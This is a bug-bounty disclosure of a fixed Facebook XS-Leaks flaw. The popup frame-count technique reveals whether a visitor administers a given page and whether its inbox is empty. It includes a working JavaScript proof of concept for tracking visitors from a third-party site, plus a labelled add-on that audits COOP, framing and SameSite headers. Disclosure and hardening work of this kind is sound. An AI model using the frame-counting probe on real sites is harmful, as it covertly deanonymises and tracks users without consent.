[XSLeaks] Tracking User with Page Admin/Editor/Moderator roles on Third Party Website

I was reading a blog post about an XSLeaks issue in Facebook which used window.length (the number of frames inside a document) to extract data about a Facebook user who visits a third-party website.

So I started looking for the same issue in Facebook and found it at https://web.facebook.com/[page_username]/inbox. You can check whether an endpoint has the same issue by typing frames.length in the browser console; in my case it returned 3. This endpoint is only accessible to a user who has the admin/editor/moderator role on the page, so a user with no role, or with a role other than admin, editor or moderator, gets a 404 page instead, and the 404 page has a frames.length of 0.

The reason frames.length returns 3 is that my page mailbox is not empty; it returns 1 if the mailbox is empty (and you are a page admin). Using this lovely behaviour I can track whether page admin A is visiting my website.

So here is the JavaScript:
<script>
var page = "Your Page Username" // username of the Facebook Page to test the visitor against

if (typeof fb === 'undefined') {
    var fb = window.open() // Create a window we keep a reference to
}

fb.location = 'https://web.facebook.com/' + page + '/inbox/' // Navigate that window to the page inbox
setTimeout(function () {
    // frames.length is 0 on the 404 page (no role), 1 for an empty inbox, 3 for a non-empty inbox
    var answer = fb.frames.length === 0 ? 'No' : 'Yes'
    var mb = fb.frames.length > 1 ? 'No' : 'Yes'
    console.log('Are you an Admin/Editor/Moderator in : ' + page + ' ? -- ' + answer + ' Mailbox Empty ? -- ' + mb)
    fb.close()
}, 5000) // wait for the inbox to finish loading before counting frames
</script>
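From the defender's side, the channel above exists because a cross-origin opener keeps a live reference to the inbox window and the inbox renders a different number of frames depending on the viewer's role. The following is an added example, not code from the original post and not Facebook's fix: a header audit that checks whether a response closes the popup and iframe variants of the frame-count leak (Cross-Origin-Opener-Policy, framing restrictions, SameSite on the session cookie), plus a Fetch Metadata check a server could apply to a role-gated route. The header sets, the cookie name `session` and the function names are this example's own assumptions.

```javascript
// Added example (not from the original post): audit the response headers of a
// page whose frame count depends on the viewer's state, and gate a sensitive
// route on Fetch Metadata. All header values below are constructed samples.
'use strict';

// Lower-case header names so lookups are case-insensitive. Set-Cookie may
// repeat, so every header is kept as an array of values.
function normalizeHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    const key = name.toLowerCase();
    const vals = Array.isArray(value) ? value : [value];
    out[key] = (out[key] || []).concat(vals.map((v) => String(v).trim()));
  }
  return out;
}

// First value of a header, lower-cased, or '' when absent.
function first(h, name) {
  return h[name] ? h[name][0].toLowerCase() : '';
}

// Two vectors read the frame count of a cross-origin document:
//   popup  - opener calls window.open(url) and reads ref.frames.length
//   iframe - embedder loads url in a frame and reads contentWindow.length
// Returns which vectors are closed and a list of human-readable gaps.
function assessFrameCountLeak(rawHeaders) {
  const h = normalizeHeaders(rawHeaders);
  const gaps = [];

  // Popup vector: COOP moves the document into its own browsing context
  // group, so a cross-origin opener's reference is severed (frames.length
  // reads 0 and ref.closed reads true) whatever the page actually rendered.
  const coop = first(h, 'cross-origin-opener-policy');
  const popupClosed = coop === 'same-origin' || coop === 'same-origin-allow-popups';
  if (!popupClosed) {
    gaps.push('no Cross-Origin-Opener-Policy: a cross-origin opener can read frames.length');
  }

  // Iframe vector: X-Frame-Options or CSP frame-ancestors refuses embedding.
  const xfo = first(h, 'x-frame-options');
  const csp = first(h, 'content-security-policy');
  const fa = /frame-ancestors\s+([^;]+)/.exec(csp);
  const cspBlocks = fa ? ["'none'", "'self'"].includes(fa[1].trim()) : false;
  const iframeClosed = xfo === 'deny' || xfo === 'sameorigin' || cspBlocks;
  if (!iframeClosed) {
    gaps.push('no framing restriction: contentWindow.length is readable from an embedding page');
  }

  // Session cookie: SameSite=Strict keeps it off cross-site top-level
  // navigations (the popup vector); Lax is still sent on those GETs and only
  // covers the iframe vector. Without the cookie the page renders the
  // logged-out state, so its frame count no longer depends on the viewer.
  const cookies = h['set-cookie'] || [];
  const sessionCookie = cookies.find((c) => /^session=/i.test(c)) || '';
  const m = /samesite=(\w+)/i.exec(sessionCookie);
  const sameSite = m ? m[1].toLowerCase() : '';
  if (sameSite !== 'strict') {
    gaps.push('session cookie SameSite=' + (sameSite || 'unset') + ': still sent on a cross-site popup navigation');
  }

  return { popupClosed, iframeClosed, sessionSameSite: sameSite, gaps };
}

// Server-side isolation for a role-gated route: refuse cross-site document
// loads using the Sec-Fetch-Site request header, so the page is never rendered
// (in any state) inside a window or frame opened by another site. Browsers
// that send no Fetch Metadata are allowed through, since nothing can be decided.
function allowSensitiveNavigation(reqHeaders) {
  const h = normalizeHeaders(reqHeaders);
  const site = first(h, 'sec-fetch-site');
  if (site === '') return true; // no Fetch Metadata: cannot decide here
  return site !== 'cross-site'; // same-origin, same-site and user-typed (none) pass
}

// Constructed samples: a response like the leaky endpoint in the post, and a
// hardened one that closes both vectors and pins the session cookie.
const LEAKY_RESPONSE = {
  'Content-Type': 'text/html',
  'Set-Cookie': ['session=abc; Path=/; Secure; HttpOnly'],
};
const HARDENED_RESPONSE = {
  'Content-Type': 'text/html',
  'Cross-Origin-Opener-Policy': 'same-origin',
  'Content-Security-Policy': "frame-ancestors 'none'",
  'Set-Cookie': ['session=abc; Path=/; Secure; HttpOnly; SameSite=Strict'],
};

console.log(assessFrameCountLeak(LEAKY_RESPONSE).gaps);    // three gaps
console.log(assessFrameCountLeak(HARDENED_RESPONSE).gaps); // []
```

COOP alone is enough to blind the opener in the PoC above, because the reference it holds stops pointing at the inbox document; the framing and cookie checks cover the embedding variant of the same measurement and the case where a browser does not honour COOP.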

and the video:

Timeline:

20-05-2019 : Initial Report
23-05-2019 : Pre-Triaged
30-05-2019 : Triaged
11-06-2019 : Fixed
21-06-2019 : Bounty Awarded ($750)
